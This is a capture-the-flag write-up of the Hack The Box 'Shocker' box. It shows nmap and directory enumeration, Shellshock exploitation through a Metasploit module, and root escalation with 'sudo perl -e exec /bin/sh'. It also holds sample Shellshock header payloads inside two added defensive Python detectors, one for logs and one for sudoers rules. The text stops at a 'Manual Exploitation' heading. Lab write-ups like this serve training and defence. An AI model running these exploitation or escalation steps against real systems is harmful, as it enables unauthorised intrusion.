This is the first HTB Write-up on the road to OSCP.
Box creator: mrb3n.
Shocker is a retired Easy-rated Linux machine that deals with the Apache mod_cgi 'Shellshock' remote command injection exploit, which can be carried out using msf or the Python script at https://www.exploit-db.com/exploits/34900.
Initial Enumeration:
echo '10.10.10.57 shocker.htb' >> /etc/hosts
export IP=shocker.htb
nmap -sC -vv -sV -Pn -O -A -oN nmap_scan.txt $IP
PORT STATE SERVICE REASON VERSION
80/tcp open http syn-ack ttl 63 Apache httpd 2.4.18 ((Ubuntu))
| http-methods:
|_ Supported Methods: OPTIONS GET HEAD POST
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
2222/tcp open ssh syn-ack ttl 63 OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQD8ArTOHWzqhwcyAZWc2CmxfLmVVTwfLZf0zhCBREGCpS2WC3NhAKQ2zefCHCU8XTC8hY9ta5ocU+p7S52OGHlaG7HuA5Xlnihl1INNsMX7gpNcfQEYnyby+hjHWPLo4++fAyO/lB8NammyA13MzvJy8pxvB9gmCJhVPaFzG5yX6Ly8OIsvVDk+qVa5eLCIua1E7WGACUlmkEGljDvzOaBdogMQZ8TGBTqNZbShnFH1WsUxBtJNRtYfeeGjztKTQqqj4WD5atU8dqV/iwmTylpE7wdHZ+38ckuYL9dmUPLh4Li2ZgdY6XniVOBGthY5a2uJ2OFp2xe1WS9KvbYjJ/tH
| 256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBPiFJd2F35NPKIQxKMHrgPzVzoNHOJtTtM+zlwVfxzvcXPFFuQrOL7X6Mi9YQF9QRVJpwtmV9KAtWltmk3qm4oc=
| 256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIC/RjKhT/2YPlCgFQLx+gOXhC6W3A3raTzjlXQMT8Msk
It seems we have two open ports:
80/tcp running Apache httpd 2.4.18
2222/tcp running OpenSSH 7.2p2
Visiting the website:
The page contains a single image, bug.jpg, showing some kind of bug with a hammer above its head. Before moving forward, two quick checks are worth doing:
1. Steganography: trying to extract as much information as possible from bug.jpg. Doing so did not reveal anything that could provide interesting information.
2. https://tineye.com: checking whether this bug.jpg shows up in other places, such as security blogs or CVE sites.
Going through the results in TinEye, we get the following:
It turns out that this bug.jpg is referred to as the "bashbug", and a quick search reveals the corresponding vulnerability, CVE-2014-6271:
https://medium.com/@nikhilh20/exploit-bash-shellshock-part-1-ad1636acaf9e
The cause of the vulnerability lies in a flaw in the way Bash parses the values of environment variables. According to CVE-2014-6271, the vulnerable Bash version "processes trailing strings after function definitions in the values of environment variables, which allows remote attackers to execute arbitrary code via a crafted environment".
Main Enumeration:
In this stage I have used various tools:
1. dirb
2. dirbuster
3. gobuster
4. wfuzz
5. dirsearch
Note: the relevant file we will soon discover can be found using any of these tools with the proper flags and wordlist.
##dirb:
---- Scanning URL: http://shocker.htb/ ----
+ http://shocker.htb/cgi-bin/ (CODE:403|SIZE:294)
+ http://shocker.htb/index.html (CODE:200|SIZE:14)
+ http://shocker.htb/server-status (CODE:403|SIZE:299)
##dirsearch:
[05:14:56] Starting:
[05:15:04] 403 - 300B - /.htaccess.bak1
[05:15:04] 403 - 300B - /.htaccess.orig
[05:15:04] 403 - 302B - /.htaccess.sample
[05:15:04] 403 - 300B - /.htaccess.save
[05:15:04] 403 - 298B - /.htaccessBAK
[05:15:04] 403 - 298B - /.htaccessOLD
[05:15:04] 403 - 299B - /.htaccessOLD2
[05:15:04] 403 - 291B - /.html
[05:15:04] 403 - 290B - /.htm
[05:15:04] 403 - 297B - /.httr-oauth
[05:15:42] 403 - 294B - /cgi-bin/
[05:15:56] 200 - 137B - /index.html
[05:16:16] 403 - 299B - /server-status
[05:16:16] 403 - 300B - /server-status/
##gobuster 2nd run:
root@kali:/home/czar/Downloads# gobuster dir -u http://shocker.htb/cgi-bin/ -t 80 -w /home/czar/Downloads/HTB/tools/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x .php,.txt,.sh
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://shocker.htb/cgi-bin/
[+] Threads: 80
[+] Wordlist: /home/czar/Downloads/HTB/tools/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Extensions: php,txt,sh
[+] Timeout: 10s
===============================================================
2020/11/28 08:23:39 Starting gobuster
===============================================================
/user.sh (Status: 200)
Progress: 2076 / 220561 (0.94%)^C
[!] Keyboard interrupt detected, terminating.
===============================================================
2020/11/28 08:23:58 Finished
===============================================================
We can see that we have found user.sh (http://shocker.htb/cgi-bin/user.sh), which is what we are looking for.
Metasploit:
We are going to use multi/http/apache_mod_cgi_bash_env_exec:
This module exploits the Shellshock vulnerability, a flaw in how the
Bash shell handles external environment variables. This module
targets CGI scripts in the Apache web server by setting the
HTTP_USER_AGENT environment variable to a malicious function
definition.
We will need to set TARGETURI to /cgi-bin/user.sh.
Spawn a proper shell using python3, and we have got ourselves a shell as the user 'shelly'.
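From the defender's side, the module description above says exactly what to look for in the web server's logs: a header value that starts like a Bash function export. The following added example (my own code, not from the write-up or from Metasploit) parses Apache combined-format access log lines constructed for this example and flags requests whose User-Agent or Referer carries the `() {` pattern, marking those aimed at the /cgi-bin/ path. The sample lines, regular expressions and function names are my own.

```python
import re
from dataclasses import dataclass

# Apache "combined" LogFormat: referer and user-agent are the two trailing quoted fields.
COMBINED_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<bytes>\S+) '
    r'"(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)

# Shellshock signature: a value that opens like a Bash function definition.
# No legitimate browser or client sends "() {" in a header.
FUNC_DEF_RE = re.compile(r"\(\)\s*\{")

# Constructed sample log lines (not real traffic): two ordinary requests and two
# that carry a function definition in a header field passed to CGI as an env var.
SAMPLE_LOG = """\
10.0.0.5 - - [28/Nov/2020:08:23:39 +0000] "GET /index.html HTTP/1.1" 200 137 "-" "Mozilla/5.0 (X11; Linux x86_64) Firefox/83.0"
10.0.0.5 - - [28/Nov/2020:08:23:41 +0000] "GET /cgi-bin/user.sh HTTP/1.1" 200 118 "-" "curl/7.72.0"
10.0.0.9 - - [28/Nov/2020:08:25:02 +0000] "GET /cgi-bin/user.sh HTTP/1.1" 200 118 "-" "() { :; }; echo shellshock-probe"
10.0.0.9 - - [28/Nov/2020:08:25:03 +0000] "GET /cgi-bin/user.sh HTTP/1.1" 200 118 "() { :;}; echo via-referer" "Mozilla/5.0"
"""


@dataclass
class Finding:
    host: str
    time: str
    path: str
    field: str        # which header carried the pattern: "agent" or "referer"
    value: str
    targets_cgi: bool  # True when the request path is under the CGI directory


def parse_combined(line):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = COMBINED_RE.match(line)
    return m.groupdict() if m else None


def find_shellshock_attempts(log_text, cgi_prefix="/cgi-bin/"):
    """Return a Finding for every header field that looks like a Bash function export."""
    findings = []
    for line in log_text.splitlines():
        rec = parse_combined(line)
        if rec is None:
            continue  # unparsable line; a real pipeline would count these
        for field in ("agent", "referer"):
            if FUNC_DEF_RE.search(rec[field]):
                findings.append(Finding(
                    host=rec["host"],
                    time=rec["time"],
                    path=rec["path"],
                    field=field,
                    value=rec[field],
                    targets_cgi=rec["path"].startswith(cgi_prefix),
                ))
    return findings


if __name__ == "__main__":
    for f in find_shellshock_attempts(SAMPLE_LOG):
        tag = "CGI" if f.targets_cgi else "non-CGI"
        print(f"{f.time} {f.host} {f.path} [{tag}] {f.field}={f.value!r}")
```

The combined format only records two request headers, so other headers that CGI exposes as environment variables (Cookie, Host, custom headers) are invisible here; logging them with additional `%{Header}i` fields in the LogFormat, or inspecting at a reverse proxy or WAF, closes that gap. Note also that a 200 status says nothing about success or failure: the injected command runs before the script produces output.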
Getting User
Not much of an issue here: shelly can grab the user flag in /home/shelly.
shelly@Shocker:/home/shelly$ cat user.txt
cat user.txt
44d**************************bb4
shelly@Shocker:/home/shelly$
Privilege Escalation
Learning from other boxes, I thought I should upload an enum script or two and see whether there were any interesting findings, but the very first command saved me all of that.
shelly@Shocker:/home/shelly$ sudo -l
sudo -l
Matching Defaults entries for shelly on Shocker:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User shelly may run the following commands on Shocker:
(root) NOPASSWD: /usr/bin/perl
It seems shelly is able to run perl with sudo privileges. A quick look at GTFOBins tells us that if shelly runs the command
sudo perl -e 'exec "/bin/sh";'
she will gain root privileges, so that's what I did.
shelly@Shocker:/home/shelly$ sudo perl -e 'exec "/bin/sh";'
# whoami && id
whoami && id
root
uid=0(root) gid=0(root) groups=0(root)
# cat /root/root.txt
cat /root/root.txt
4fb5************************ad55
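The root cause here is a sudoers rule that hands an interpreter to a user with no password and no argument restriction. The following added example (my own code, not part of the write-up) parses `sudo -l` style output, constructed here and modelled on the Shocker entry, and flags rules whose command is a shell-capable binary with unrestricted arguments. The list of shell-capable binaries is a small constructed subset of what GTFOBins documents, and the sample entries other than the perl one are invented.

```python
import re

# Constructed subset of binaries that can hand back a shell when run as root.
# GTFOBins lists many more; extend this to match your own inventory.
SHELL_CAPABLE = {
    "perl", "python", "python2", "python3", "ruby", "bash", "sh", "dash", "zsh",
    "vim", "vi", "nano", "less", "more", "find", "awk", "gawk", "env", "tar", "zip",
}

# Constructed sample of `sudo -l` output: the first rule is the Shocker entry,
# the other two are invented for contrast.
SAMPLE_SUDO_L = r"""Matching Defaults entries for shelly on Shocker:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User shelly may run the following commands on Shocker:
    (root) NOPASSWD: /usr/bin/perl
    (root) /usr/bin/systemctl restart apache2
    (ALL) NOPASSWD: /usr/bin/apt-get update, /usr/bin/find
"""

# "(runas) TAG: TAG: command, command" as printed by sudo -l.
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]+)\)\s*(?P<tags>(?:[A-Z_]+:\s*)*)(?P<cmds>.+)$")


def parse_sudo_l(text):
    """Return one dict per command in the 'may run the following commands' section."""
    rules = []
    in_commands = False
    for line in text.splitlines():
        if line.startswith("User ") and "may run" in line:
            in_commands = True
            continue
        if not in_commands:
            continue  # skip the Defaults block
        m = RULE_RE.match(line)
        if not m:
            continue
        tags = {t.rstrip(":") for t in m.group("tags").split() if t.rstrip(":")}
        for cmd in m.group("cmds").split(","):
            cmd = cmd.strip()
            if cmd:
                rules.append({"runas": m.group("runas"), "tags": tags, "command": cmd})
    return rules


def risky_rules(rules):
    """Flag rules where a shell-capable binary may be run with any arguments.

    A rule that pins arguments (e.g. 'systemctl restart apache2') is not
    flagged; sudo only matches that exact argument list.
    """
    flagged = []
    for r in rules:
        parts = r["command"].split()
        if not parts:
            continue
        base = parts[0].rsplit("/", 1)[-1]
        unrestricted_args = len(parts) == 1
        if base in SHELL_CAPABLE and unrestricted_args:
            nopasswd = "NOPASSWD" in r["tags"]
            flagged.append({
                **r,
                "reason": f"{base} can spawn a shell and arguments are unrestricted"
                          + (" without a password" if nopasswd else ""),
            })
    return flagged


if __name__ == "__main__":
    for r in risky_rules(parse_sudo_l(SAMPLE_SUDO_L)):
        print(f"({r['runas']}) {r['command']}: {r['reason']}")
```

The usual fix is to grant the specific script or fixed argument list the user actually needs (a wrapper under a root-owned, non-writable path) rather than the interpreter itself; with the arguments pinned the rule drops out of the flagged set.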
Manual Exploitation:
The same process can be done using the following Python script: